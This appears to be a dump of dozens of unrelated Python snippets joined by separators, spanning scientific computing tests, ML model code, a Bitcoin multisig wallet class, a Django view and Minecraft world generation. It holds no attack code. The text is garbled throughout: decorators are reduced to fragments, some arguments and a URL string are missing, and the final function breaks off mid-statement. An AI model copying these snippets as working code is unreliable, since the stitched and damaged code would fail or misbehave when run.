return np.mean(f1) |
class TestHalfStudentT(BaseTestDistributionRandom):
def halfstudentt_rng_fn(self, df, loc, scale, size, rng):
return np.abs(st.t.rvs(df=df, loc=loc, scale=scale, size=size, random_state=rng))
pymc_dist = pm.HalfStudentT
pymc_dist_params = {'nu': 5.0, 'sigma': 2.0}
expected_rv_op_params = {'nu': 5.0, 'sigma': 2.0}
reference_dist_params = {'df': 5.0, 'loc': 0, 'scale': 2.0}
reference_dist = (lambda self: ft.partial(self.halfstudentt_rng_fn, rng=self.get_random_state()))
checks_to_run = ['check_pymc_params_match_rv_op', 'check_pymc_draws_match_reference', 'check_rv_size'] |
def wait_until_passes(timeout, retry_interval, func, exceptions=Exception, *args, **kwargs):
start = timestamp()
while True:
try:
func_val = func(*args, **kwargs)
break
except exceptions as e:
time_left = (timeout - (timestamp() - start))
if (time_left > 0):
time.sleep(min(retry_interval, time_left))
else:
err = TimeoutError()
err.original_exception = e
raise err
return func_val |
def get_nuc(mydf, kpts=None):
from pyscf.pbc.dft import gen_grid
(kpts, is_single_kpt) = _check_kpts(mydf, kpts)
cell = mydf.cell
mesh = mydf.mesh
charge = (- cell.atom_charges())
Gv = cell.get_Gv(mesh)
SI = cell.get_SI(mesh=mesh)
rhoG = numpy.dot(charge, SI)
coulG = tools.get_coulG(cell, mesh=mesh, Gv=Gv)
vneG = (rhoG * coulG)
vneR = tools.ifft(vneG, mesh).real
vne = ([0] * len(kpts))
for (ao_ks_etc, p0, p1) in mydf.aoR_loop(mydf.grids, kpts):
ao_ks = ao_ks_etc[0]
for (k, ao) in enumerate(ao_ks):
vne[k] += lib.dot((ao.T.conj() * vneR[p0:p1]), ao)
ao = ao_ks = None
if is_single_kpt:
vne = vne[0]
return numpy.asarray(vne) |
def test_source_add_secondary(tester: CommandTester, source_existing: Source, source_secondary: Source, poetry_with_source: Poetry) -> None:
tester.execute(f'--priority=secondary {source_secondary.name} {source_secondary.url}')
assert_source_added(tester, poetry_with_source, source_existing, source_secondary) |
def test_pbsproscript_generator():
jd = rs.job.Description()
jd.name = 'Test'
jd.executable = '/bin/sleep'
jd.arguments = 10
jd.environment = {'test_env': 15, 'RADICAL_BASE': '/tmp'}
jd.working_directory = '/home/user'
jd.output = 'output.log'
jd.error = 'error.log'
jd.processes_per_host = POLARIS_PPN
jd.queue = 'normal-queue'
jd.project = 'PROJ0000'
jd.wall_time_limit = 15
jd.system_architecture = {'options': ['filesystems=grand:home', 'place=scatter']}
jd.total_cpu_count = (POLARIS_PPN * NUM_NODES)
jd.total_gpu_count = NUM_NODES
tgt_script = '\n#!/bin/bash\n\n#PBS -N Test\n#PBS -o /home/user/output.log\n#PBS -e /home/user/error.log\n#PBS -l walltime=0:15:00\n#PBS -A PROJ0000\n#PBS -q normal-queue\n#PBS -l select=4:ncpus=64\n#PBS -l filesystems=grand:home\n#PBS -l place=scatter\n#PBS -v \\"test_env=15\\",\\"RADICAL_BASE=/tmp\\"\n\nexport SAGA_PPN=64\nexport PBS_O_WORKDIR=/home/user \nmkdir -p /home/user\ncd /home/user\n\n/bin/sleep 10\n'
script = rsapj._script_generator(url=None, logger=mock.Mock(), jd=jd, ppn=1, gres=None, version='', is_cray=False, queue=None)
assert (script == tgt_script) |
def test_validate_regex(db, source_schema, debug=True):
dbt_vars = {'source_schema': source_schema}
print(f'Running setup and tests for {db}')
dbt_seed(f'--select public_macros.validating', db, dbt_vars)
dbt_run(f'--select public_macros.validating', db, dbt_vars)
dbt_test(f'--select public_macros.validating', db, dbt_vars)
print(f'Running tests completed for {db}') |
class TestLoadProjectFromConfig():
def test_no_project_no_project_dirs(self, config_file):
assert (Project.from_config(config_file.model, 'foo') is None)
def test_project_empty_string(self, config_file, temp_dir):
config_file.model.projects[''] = str(temp_dir)
assert (Project.from_config(config_file.model, '') is None)
def test_project_basic_string(self, config_file, temp_dir):
config_file.model.projects = {'foo': str(temp_dir)}
project = Project.from_config(config_file.model, 'foo')
assert (project.chosen_name == 'foo')
assert (project.location == temp_dir)
def test_project_complex(self, config_file, temp_dir):
config_file.model.projects = {'foo': {'location': str(temp_dir)}}
project = Project.from_config(config_file.model, 'foo')
assert (project.chosen_name == 'foo')
assert (project.location == temp_dir)
def test_project_complex_null_location(self, config_file):
config_file.model.projects = {'foo': {'location': ''}}
assert (Project.from_config(config_file.model, 'foo') is None)
def test_project_dirs(self, config_file, temp_dir):
path = (temp_dir / 'foo')
path.mkdir()
config_file.model.dirs.project = [str(temp_dir)]
project = Project.from_config(config_file.model, 'foo')
assert (project.chosen_name == 'foo')
assert (project.location == path)
def test_project_dirs_null_dir(self, config_file):
config_file.model.dirs.project = ['']
assert (Project.from_config(config_file.model, 'foo') is None)
def test_project_dirs_not_directory(self, config_file, temp_dir):
path = (temp_dir / 'foo')
path.touch()
config_file.model.dirs.project = [str(temp_dir)]
assert (Project.from_config(config_file.model, 'foo') is None) |
def register_event_loop_telemetry(app: FastAPI):
_event('startup')
async def add_fastapi_event_loop_monitoring():
app.state.fastapi_event_loop_schedule_latency_metrics = metrics.Histogram('anyscale_fastapi_event_loop_schedule_latency', description='Latency of getting yielded control on the FastAPI event loop in seconds', boundaries=_LATENCY_HISTOGRAM_BOUNDARIES, tag_keys=('api_server',))
app.state.fastapi_event_loop_monitoring_iterations = metrics.Counter('anyscale_fastapi_event_loop_monitoring_iterations', description='Number of times the FastAPI event loop has iterated to get anyscale_fastapi_event_loop_schedule_latency.', tag_keys=('api_server',))
app.state.fastapi_event_loop_monitoring_tasks = metrics.Gauge('anyscale_fastapi_event_loop_monitoring_tasks', description='Number of outsanding tasks on the FastAPI event loop.', tag_keys=('api_server',))
tags = {'api_server': _get_app_name(app)}
app.state.fastapi_event_loop_schedule_latency_metrics_task = setup_event_loop_monitoring(asyncio.get_running_loop(), app.state.fastapi_event_loop_schedule_latency_metrics, app.state.fastapi_event_loop_monitoring_iterations, app.state.fastapi_event_loop_monitoring_tasks, tags) |
def get_default_configs():
config = ml_collections.ConfigDict()
config.training = training = ml_collections.ConfigDict()
config.training.batch_size = 128
training.n_iters = 1300001
training.snapshot_freq = 50000
training.log_freq = 50
training.eval_freq = 100
training.snapshot_freq_for_preemption = 10000
training.snapshot_sampling = True
training.likelihood_weighting = False
training.continuous = True
training.n_jitted_steps = 5
training.reduce_mean = False
config.sampling = sampling = ml_collections.ConfigDict()
sampling.n_steps_each = 1
sampling.noise_removal = True
sampling.probability_flow = False
sampling.snr = 0.16
config.eval = evaluate = ml_collections.ConfigDict()
evaluate.begin_ckpt = 9
evaluate.end_ckpt = 26
evaluate.batch_size = 1024
evaluate.enable_sampling = False
evaluate.num_samples = 50000
evaluate.enable_loss = True
evaluate.enable_bpd = False
evaluate.bpd_dataset = 'test'
config.data = data = ml_collections.ConfigDict()
data.dataset = 'CIFAR10'
data.image_size = 32
data.random_flip = True
data.centered = False
data.uniform_dequantization = False
data.num_channels = 3
config.model = model = ml_collections.ConfigDict()
model.sigma_min = 0.01
model.sigma_max = 50
model.num_scales = 1000
model.beta_min = 0.1
model.beta_max = 20.0
model.dropout = 0.1
model.embedding_type = 'fourier'
config.optim = optim = ml_collections.ConfigDict()
optim.weight_decay = 0
optim.optimizer = 'Adam'
optim.lr = 0.0002
optim.beta1 = 0.9
optim.eps = 1e-08
optim.warmup = 5000
optim.grad_clip = 1.0
config.seed = 42
return config |
class InputFeedRNNDecoder(RNNDecoderBase):
def _run_forward_pass(self, tgt, memory_bank, memory_lengths=None, memory_bank_utterance=None, memory_lengths_utterance=None, hier_matrix=None):
input_feed = self.state['input_feed'].squeeze(0)
(input_feed_batch, _) = input_feed.size()
(_, tgt_batch, _) = tgt.size()
aeq(tgt_batch, input_feed_batch)
dec_outs = []
attns = {}
if (self.attn is not None):
attns['std'] = []
if ((self.copy_attn is not None) or self._reuse_copy_attn):
attns['copy'] = []
if self._coverage:
attns['coverage'] = []
emb = self.embeddings(tgt)
emb = self.drop(emb)
assert (emb.dim() == 3)
dec_state = self.state['hidden']
coverage = (self.state['coverage'].squeeze(0) if (self.state['coverage'] is not None) else None)
for emb_t in emb.split(1):
decoder_input = torch.cat([emb_t.squeeze(0), input_feed], 1)
(rnn_output, dec_state) = self.rnn(decoder_input, dec_state)
if self.attentional:
(decoder_output, p_attn) = self.attn(rnn_output, memory_bank.transpose(0, 1), memory_lengths=memory_lengths, memory_bank_utterance=memory_bank_utterance.transpose(0, 1), memory_lengths_utterance=memory_lengths_utterance, hier_matrix=hier_matrix)
attns['std'].append(p_attn)
else:
decoder_output = rnn_output
if (self.context_gate is not None):
decoder_output = self.context_gate(decoder_input, rnn_output, decoder_output)
decoder_output = self.drop(decoder_output)
input_feed = decoder_output
dec_outs += [decoder_output]
if self._coverage:
coverage = (p_attn if (coverage is None) else (p_attn + coverage))
attns['coverage'] += [coverage]
if (self.copy_attn is not None):
(_, copy_attn) = self.copy_attn(decoder_output, memory_bank.transpose(0, 1))
attns['copy'] += [copy_attn]
elif self._reuse_copy_attn:
attns['copy'] = attns['std']
return (dec_state, dec_outs, attns)
def _build_rnn(self, rnn_type, input_size, hidden_size, num_layers, dropout):
assert (rnn_type != 'SRU'), "SRU doesn't support input feed! Please set -input_feed 0!"
stacked_cell = (StackedLSTM if (rnn_type == 'LSTM') else StackedGRU)
return stacked_cell(num_layers, input_size, hidden_size, dropout)
def _input_size(self):
return (self.embeddings.embedding_size + self.hidden_size)
def update_dropout(self, dropout):
self.dropout.p = dropout
self.rnn.dropout.p = dropout
self.embeddings.update_dropout(dropout) |
def test_formatter_encodings():
from pygments.formatters import HtmlFormatter
fmt = HtmlFormatter()
tokens = [(Text, 'a')]
out = format(tokens, fmt)
assert isinstance(out, str)
assert ('a' in out)
fmt = HtmlFormatter(encoding='latin1')
tokens = [(Text, 'a')]
assert ('a'.encode('latin1') in format(tokens, fmt))
fmt = HtmlFormatter(encoding='latin1', outencoding='utf8')
tokens = [(Text, 'a')]
assert ('a'.encode() in format(tokens, fmt)) |
class UnderwaterDecorator(ChartDecorator):
def __init__(self, series: QFSeries, colors_alpha: float=1.0, key: str=None):
super().__init__(key)
self.series = series
self._colors_alpha = colors_alpha
def decorate(self, chart: 'Chart') -> None:
drawdown_series = drawdown_tms(self.series)
drawdown_series *= (- 1)
ax = chart.axes
ax.yaxis.set_major_formatter(PercentageFormatter())
ax.fill_between(drawdown_series.index, 0, drawdown_series.values, alpha=self._colors_alpha)
ax.set_ylim(top=0) |
def urdf_add_collision(builder, link, collisions, density, shape_ke, shape_kd, shape_kf, shape_mu):
for collision in collisions:
origin = urdfpy.matrix_to_xyz_rpy(collision.origin)
pos = origin[0:3]
rot = wp.quat_rpy(*origin[3:6])
geo = collision.geometry
if geo.box:
builder.add_shape_box(body=link, pos=pos, rot=rot, hx=(geo.box.size[0] * 0.5), hy=(geo.box.size[1] * 0.5), hz=(geo.box.size[2] * 0.5), density=density, ke=shape_ke, kd=shape_kd, kf=shape_kf, mu=shape_mu)
if geo.sphere:
builder.add_shape_sphere(body=link, pos=pos, rot=rot, radius=geo.sphere.radius, density=density, ke=shape_ke, kd=shape_kd, kf=shape_kf, mu=shape_mu)
if geo.cylinder:
r = wp.quat_from_axis_angle((0.0, 1.0, 0.0), (math.pi * 0.5))
builder.add_shape_capsule(body=link, pos=pos, rot=wp.mul(rot, r), radius=geo.cylinder.radius, half_width=(geo.cylinder.length * 0.5), density=density, ke=shape_ke, kd=shape_kd, kf=shape_kf, mu=shape_mu)
if geo.mesh:
for m in geo.mesh.meshes:
faces = []
vertices = []
for v in m.vertices:
vertices.append(np.array(v))
for f in m.faces:
faces.append(int(f[0]))
faces.append(int(f[1]))
faces.append(int(f[2]))
mesh = Mesh(vertices, faces)
builder.add_shape_mesh(body=link, pos=pos, rot=rot, mesh=mesh, density=density, ke=shape_ke, kd=shape_kd, kf=shape_kf, mu=shape_mu) |
_required
def invite_accept(request, orgslugname):
if (orgslugname == ''):
return HttpResponse(status=500)
pytitionuser = get_session_user(request)
try:
org = Organization.objects.get(slugname=orgslugname)
except Organization.DoesNotExist:
raise Http404(_('not found'))
if (org in pytitionuser.invitations.all()):
try:
with transaction.atomic():
pytitionuser.invitations.remove(org)
org.members.add(pytitionuser)
except:
return HttpResponse(status=500)
else:
raise Http404(_('not found'))
return redirect('user_dashboard') |
class Multisig_Wallet(Deterministic_Wallet):
def __init__(self, db, storage, *, config):
self.wallet_type = db.get('wallet_type')
(self.m, self.n) = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, db, storage, config=config)
def get_public_keys(self, address):
return [pk.hex() for pk in self.get_public_keys_with_deriv_info(address)]
def pubkeys_to_address(self, pubkeys):
redeem_script = self.pubkeys_to_scriptcode(pubkeys)
return bitcoin.redeem_script_to_address(self.txin_type, redeem_script)
def pubkeys_to_scriptcode(self, pubkeys: Sequence[str]) -> str:
return transaction.multisig_script(sorted(pubkeys), self.m)
def get_redeem_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if (txin_type == 'p2sh'):
return scriptcode
elif (txin_type == 'p2wsh-p2sh'):
return bitcoin.p2wsh_nested_script(scriptcode)
elif (txin_type == 'p2wsh'):
return None
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def get_witness_script(self, address):
txin_type = self.get_txin_type(address)
pubkeys = self.get_public_keys(address)
scriptcode = self.pubkeys_to_scriptcode(pubkeys)
if (txin_type == 'p2sh'):
return None
elif (txin_type in ('p2wsh-p2sh', 'p2wsh')):
return scriptcode
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i).hex() for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = ('x%d/' % (i + 1))
self.keystores[name] = load_keystore(self.db, name)
self.keystore = self.keystores['x1/']
xtype = bip32.xpub_type(self.keystore.xpub)
self.txin_type = ('p2sh' if (xtype == 'standard') else xtype)
def save_keystore(self):
for (name, k) in self.keystores.items():
self.db.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def can_have_keystore_encryption(self):
return any([k.may_have_password() for k in self.get_keystores()])
def _update_password_for_keystore(self, old_pw, new_pw):
for (name, keystore) in self.keystores.items():
if keystore.may_have_password():
keystore.update_password(old_pw, new_pw)
self.db.put(name, keystore.dump())
def check_password(self, password):
for (name, keystore) in self.keystores.items():
if keystore.may_have_password():
keystore.check_password(password)
if self.has_storage_encryption():
self.storage.check_password(password)
def get_available_storage_encryption_version(self):
return StorageEncryptionVersion.USER_PASSWORD
def has_seed(self):
return self.keystore.has_seed()
def is_watching_only(self):
return all([k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys())) |
def fused_leaky_relu(input, bias, negative_slope=0.2, scale=(2 ** 0.5)):
rest_dim = ([1] * ((input.ndim - bias.ndim) - 1))
input = input.cuda()
if (input.ndim == 3):
return (F.leaky_relu((input + bias.view(1, *rest_dim, bias.shape[0])), negative_slope=negative_slope) * scale)
else:
return (F.leaky_relu((input + bias.view(1, bias.shape[0], *rest_dim)), negative_slope=negative_slope) * scale) |
class TestWeighting():
(params=['A', 'C', 'Z'])
def weighting(self, request):
return request.param
def test_weighting_functions(self, weighting):
frequencies = NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES
values = WEIGHTING_VALUES[weighting]
function_values = WEIGHTING_FUNCTIONS[weighting](frequencies)
assert (np.abs((values - function_values)).max() < 0.3)
def test_weighting_systems(self, weighting):
frequencies = NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES
values = WEIGHTING_VALUES[weighting]
(w, H) = freqresp(WEIGHTING_SYSTEMS[weighting](), w=((2.0 * np.pi) * frequencies))
results = (20.0 * np.log10(np.abs(H)))
assert (np.abs((values - results)).max() < 0.3) |
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, kernel_size, stride, expand_ratio, act, se):
super(InvertedResidual, self).__init__()
assert (stride in [1, 2])
self.stride = stride
self.act = act
self.se = se
padding = (kernel_size // 2)
hidden_dim = round((inp * expand_ratio))
self.use_res_connect = ((self.stride == 1) and (inp == oup))
self.conv1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn1 = nn.BatchNorm2d(hidden_dim)
self.conv2 = nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, padding, groups=hidden_dim, bias=False)
self.bn2 = nn.BatchNorm2d(hidden_dim)
if self.se:
self.mid_se = SEModule(hidden_dim, act)
self.conv3 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = nn.BatchNorm2d(oup)
def forward(self, x):
inputs = x
x = self.conv1(x)
x = self.bn1(x)
x = self.act(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.act(x)
if self.se:
x = self.mid_se(x)
x = self.conv3(x)
x = self.bn3(x)
if self.use_res_connect:
return (inputs + x)
else:
return x |
def main():
parser = argparse.ArgumentParser(description='ReID Baseline Inference')
parser.add_argument('--config_file', default='', help='path to config file', type=str)
parser.add_argument('opts', help='Modify config options using the command-line', default=None, nargs=argparse.REMAINDER)
args = parser.parse_args()
num_gpus = (int(os.environ['WORLD_SIZE']) if ('WORLD_SIZE' in os.environ) else 1)
if (args.config_file != ''):
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if (output_dir and (not os.path.exists(output_dir))):
mkdir(output_dir)
logger = setup_logger('reid_baseline', output_dir, 0)
logger.info('Using {} GPUS'.format(num_gpus))
logger.info(args)
if (args.config_file != ''):
logger.info('Loaded configuration file {}'.format(args.config_file))
with open(args.config_file, 'r') as cf:
config_str = ('\n' + cf.read())
logger.info(config_str)
logger.info('Running with config:\n{}'.format(cfg))
cudnn.benchmark = True
(train_loader, val_loader, num_query, num_classes) = make_data_loader(cfg)
model = build_model(cfg, num_classes)
model.load_state_dict(torch.load(cfg.TEST.WEIGHT).module.state_dict())
model = nn.DataParallel(model)
inference(cfg, model, val_loader, num_query) |
def test_percent_not_hundred_before_complete(ansi_io: BufferedIO) -> None:
bar = ProgressBar(ansi_io, 200, 0)
bar.start()
bar.display()
bar.advance(199)
bar.advance()
output = [' 0/200 [>] 0%', ' 199/200 [>] 99%', ' 200/200 [] 100%']
expected = generate_output(output)
assert (expected == ansi_io.fetch_error()) |
def get_cuda_bare_metal_version(cuda_dir):
raw_output = subprocess.check_output([(cuda_dir + '/bin/nvcc'), '-V'], universal_newlines=True)
output = raw_output.split()
release_idx = (output.index('release') + 1)
release = output[release_idx].split('.')
bare_metal_major = release[0]
bare_metal_minor = release[1][0]
return (raw_output, bare_metal_major, bare_metal_minor) |
def new_level_nbt(version: tuple, level_name: str, spawn: tuple, seed: int) -> nbt.TAG_Compound:
return nbt.TAG_Compound('', [nbt.TAG_Compound('Data', [nbt.TAG_Byte('allowCommands', 0), nbt.TAG_Double('BorderCenterX', 0), nbt.TAG_Double('BorderCenterZ', 0), nbt.TAG_Double('BorderDamagePerBlock', 0.2), nbt.TAG_Double('BorderSize', ), nbt.TAG_Double('BorderSafeZone', 5), nbt.TAG_Double('BorderSizeLerpTarget', ), nbt.TAG_Long('BorderSizeLerpTime', 0), nbt.TAG_Double('BorderWarningBlocks', 5), nbt.TAG_Double('BorderWarningTime', 15), nbt.TAG_Double('clearWeatherTime', 0), nbt.TAG_Compound('CustomBossEvents', []), nbt.TAG_Compound('DataPacks', [nbt.TAG_List('Disabled', []), nbt.TAG_List('Enabled', [])]), nbt.TAG_Int('DataVersion', version[0]), nbt.TAG_Long('DayTime', 0), nbt.TAG_Byte('Difficulty', 2), nbt.TAG_Byte('DifficultyLocked', 0), nbt.TAG_Compound('DimensionData', [nbt.TAG_Compound('1', [nbt.TAG_Compound('DragonFight', [nbt.TAG_Compound('ExitPortalLocation', [nbt.TAG_Byte('X', 0), nbt.TAG_Byte('Y', 100), nbt.TAG_Byte('Z', 0)]), nbt.TAG_List('Gateways', [nbt.TAG_Int(None, i) for i in range(19)]), nbt.TAG_Byte('DragonKilled', 0), nbt.TAG_Long('DragonUUIDLeast', 0), nbt.TAG_Long('DragonKilledUUIDMost', 0), nbt.TAG_Byte('PreviouslyKilled', 0)])])]), nbt.TAG_Compound('GameRules', [nbt.TAG_String('announceAdvancements', 'true'), nbt.TAG_String('commandBlockOutput', 'true'), nbt.TAG_String('disableElytraMovementCheck', 'false'), nbt.TAG_String('disableRaids', 'false'), nbt.TAG_String('doDaylightCycle', 'true'), nbt.TAG_String('doEntityDrops', 'true'), nbt.TAG_String('doFireTick', 'true'), nbt.TAG_String('doInsomnia', 'true'), nbt.TAG_String('doImmediateRespawn', 'false'), nbt.TAG_String('doLimitedCrafting', 'false'), nbt.TAG_String('doMobLoot', 'true'), nbt.TAG_String('doMobSpawning', 'true'), nbt.TAG_String('doPatrolSpawning', 'true'), nbt.TAG_String('doTileDrops', 'true'), nbt.TAG_String('doTraderSpawning', 'true'), nbt.TAG_String('doWeatherCycle', 'true'), nbt.TAG_String('drowningDamage', 'true'), nbt.TAG_String('fallDamage', 'true'), nbt.TAG_String('fireDamage', 'true'), nbt.TAG_String('forgiveDeadPlayers', 'true'), nbt.TAG_String('keepInventory', 'false'), nbt.TAG_String('logAdminCommands', 'true'), nbt.TAG_String('maxCommandChainLength', '65536'), nbt.TAG_String('maxEntityCramming', '24'), nbt.TAG_String('mobGriefing', 'true'), nbt.TAG_String('naturalRegeneration', 'true'), nbt.TAG_String('randomTickSpeed', '3'), nbt.TAG_String('reducedDebugInfo', 'false'), nbt.TAG_String('sendCommandFeedback', 'true'), nbt.TAG_String('showDeathMessages', 'true'), nbt.TAG_String('spawnRadius', '10'), nbt.TAG_String('spectatorsGenerateChunks', 'true'), nbt.TAG_String('universalAnger', 'false')]), nbt.TAG_Compound('WorldGenSettings', [nbt.TAG_Byte('bonus_chest', 0), nbt.TAG_Long('seed', seed), nbt.TAG_Byte('generate_features', 1), nbt.TAG_Compound('dimensions', [])]), nbt.TAG_Int('GameType', 0), nbt.TAG_Byte('hardcore', 0), nbt.TAG_Byte('initialized', 0), nbt.TAG_Long('LastPlayed', int((time.time() * 1000))), nbt.TAG_Long('LevelName', level_name), nbt.TAG_Byte('MapFeatures', 1), nbt.TAG_Byte('raining', 0), nbt.TAG_Int('rainTime', (random.randint(1, 3) * 24000)), nbt.TAG_Long('RandomSeed', seed), nbt.TAG_Long('SizeOnDisk', 0), nbt.TAG_Int('SpawnX', spawn[0]), nbt.TAG_Int('SpawnY', spawn[1]), nbt.TAG_Int('SpawnZ', spawn[2]), nbt.TAG_Byte('thundering', 0), nbt.TAG_Int('thunderTime', (random.randint(1, 3) * 24000)), nbt.TAG_Long('Time', 0), nbt.TAG_Int('version', version[2]), nbt.TAG_Compound('Version', [nbt.TAG_Int('Id', version[0]), nbt.TAG_String('Name', version[1]), nbt.TAG_Byte('Snapshot', 0)]), nbt.TAG_Int_Array('WanderingTraderId', [0, 0, 0, 0]), nbt.TAG_Int('WanderingTraderSpawnChance', 50), nbt.TAG_Int('WanderingTraderSpawnDelay', 10000)])]) |
def get_control_lateral(text):
match = re.search('(\\d+)% to the (right|left)\\.', text, re.IGNORECASE)
if match:
(percentage, direction) = match.groups()
value = (int(percentage) / 100.0)
if (direction.lower() == 'right'):
value *= (- 1)
return value
return None |
class BootstrapGridsUI(UserInterface):
def assemble(self):
basics = self.define_view('/gridBasics', title='Grid basics', page=GridBasicsPage.factory())
page_layout = self.define_view('/pageLayout', title='Page layout', page=PageLayoutPage.factory())
container_layout = self.define_view('/containerLayout', title='Container layout', page=ContainerPage.factory())
bookmarks = [basics.as_bookmark(self), page_layout.as_bookmark(self), container_layout.as_bookmark(self)]
self.define_view('/', title='Home', page=HomePage.factory(bookmarks)) |
def save_categories_to_csv_file(categories, csv_path):
categories.sort(key=(lambda x: x['id']))
with tf.gfile.Open(csv_path, 'w') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='"')
for category in categories:
writer.writerow([category['id'], category['name']]) |
def test_list_mixin_with_attributes(gl):
class M(ListMixin, FakeManager):
_types = {'my_array': gl_types.ArrayAttribute}
url = '
responses.add(method=responses.GET, headers={}, url=url, json=[], status=200, match=[responses.matchers.query_param_matcher({'my_array[]': ['1', '2', '3']})])
mgr = M(gl)
mgr.list(iterator=True, my_array=[1, 2, 3]) |
def _unpack_db(content, local_file_name):
zip_contents = io.BytesIO(content)
with zipfile.ZipFile(zip_contents) as zip_file:
inner_file_name = zip_file.namelist()[0]
with zip_file.open(inner_file_name) as zipped_db_file:
with open(local_file_name, 'w+b') as db_file:
db_file.write(zipped_db_file.read())
return inner_file_name
raise RuntimeError('Could not find database within zip file') |
def write_features(fobj, collection, sequence=False, geojson_type='feature', use_rs=False, **dump_kwds):
if sequence:
for feat in collection():
(xs, ys) = zip(*coords(feat))
bbox = (min(xs), min(ys), max(xs), max(ys))
if use_rs:
fobj.write(u'\x1e')
if (geojson_type == 'bbox'):
fobj.write(json.dumps(bbox, **dump_kwds))
else:
fobj.write(json.dumps(feat, **dump_kwds))
fobj.write('\n')
else:
features = list(collection())
if (geojson_type == 'bbox'):
fobj.write(json.dumps(collection.bbox, **dump_kwds))
else:
fobj.write(json.dumps({'bbox': collection.bbox, 'type': 'FeatureCollection', 'features': features}, **dump_kwds))
fobj.write('\n') |
class Model(ModelDesc):
def get_policy(self, role_id, state, last_cards, minor_type):
batch_size = tf.shape(role_id)[0]
gathered_outputs = []
indices = []
for idx in range(1, 4):
with tf.variable_scope(('policy_network_%d' % idx)):
id_idx = tf.where(tf.equal(role_id, idx))
indices.append(id_idx)
state_id = tf.gather_nd(state, id_idx)
last_cards_id = tf.gather_nd(last_cards, id_idx)
minor_type_id = tf.gather_nd(minor_type, id_idx)
with slim.arg_scope([slim.fully_connected, slim.conv2d], weights_regularizer=slim.l2_regularizer(POLICY_WEIGHT_DECAY)):
with tf.variable_scope('branch_main'):
x = state_id
feats = [1024, 512, 512, 256, 256]
for f in feats:
for _ in range(3):
x = res_fc_block(x, f)
flattened = x
with tf.variable_scope('branch_passive'):
x = last_cards_id
for f in feats:
for _ in range(3):
x = res_fc_block(x, f)
flattened_last = x
with tf.variable_scope('decision'):
attention_decision = slim.fully_connected(inputs=res_fc_block(flattened_last, 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
fc_passive_decision = res_fc_block(flattened, 256)
fc_passive_decision = (fc_passive_decision * attention_decision)
fc_passive_decision = res_fc_block(fc_passive_decision, 64)
passive_decision_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_decision, 64), num_outputs=4, activation_fn=None)
with tf.variable_scope('bomb'):
fc_passive_bomb = res_fc_block(flattened, 256)
fc_passive_bomb = res_fc_block(fc_passive_bomb, 64)
passive_bomb_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_bomb, 64), num_outputs=13, activation_fn=None)
with tf.variable_scope('response'):
attention_response = slim.fully_connected(inputs=res_fc_block(flattened_last, 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
fc_passive_response = res_fc_block(flattened, 256)
fc_passive_response = (fc_passive_response * attention_response)
fc_passive_response = res_fc_block(fc_passive_response, 64)
passive_response_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_response, 64), num_outputs=15, activation_fn=None)
with tf.variable_scope('branch_active'):
hidden_size = 256
lstm_active = rnn.BasicLSTMCell(num_units=hidden_size, state_is_tuple=True)
with tf.variable_scope('decision'):
fc_active_decision = res_fc_block(flattened, 256)
(lstm_active_decision_output, hidden_active_output) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_decision, 1), initial_state=lstm_active.zero_state(tf.shape(fc_active_decision)[0], dtype=tf.float32), sequence_length=tf.ones([tf.shape(state_id)[0]]))
fc_active_decision = res_fc_block(tf.squeeze(lstm_active_decision_output, axis=[1]), 64)
active_decision_logits = slim.fully_connected(inputs=res_fc_block(fc_active_decision, 64), num_outputs=13, activation_fn=None)
with tf.variable_scope('response'):
fc_active_response = res_fc_block(flattened, 256)
(lstm_active_response_output, hidden_active_output) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_response, 1), initial_state=hidden_active_output, sequence_length=tf.ones([tf.shape(state_id)[0]]))
fc_active_decision = res_fc_block(tf.squeeze(lstm_active_response_output, axis=[1]), 64)
active_response_logits = slim.fully_connected(inputs=res_fc_block(fc_active_decision, 64), num_outputs=15, activation_fn=None)
with tf.variable_scope('seq_length'):
fc_active_seq = res_fc_block(flattened, 256)
(lstm_active_seq_output, _) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_seq, 1), initial_state=hidden_active_output, sequence_length=tf.ones([tf.shape(state_id)[0]]))
fc_active_seq = res_fc_block(tf.squeeze(lstm_active_seq_output, axis=[1]), 64)
active_seq_logits = slim.fully_connected(inputs=res_fc_block(fc_active_seq, 64), num_outputs=12, activation_fn=None)
with tf.variable_scope('branch_minor'):
fc_minor = res_fc_block(flattened, 256)
minor_type_embedding = slim.fully_connected(inputs=res_fc_block(tf.one_hot(minor_type_id, 2), 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
fc_minor = (fc_minor * minor_type_embedding)
fc_minor = res_fc_block(fc_minor, 64)
minor_response_logits = slim.fully_connected(inputs=res_fc_block(fc_minor, 64), num_outputs=15, activation_fn=None)
gathered_output = [passive_decision_logits, passive_bomb_logits, passive_response_logits, active_decision_logits, active_response_logits, active_seq_logits, minor_response_logits]
if ((idx == 1) or (idx == 3)):
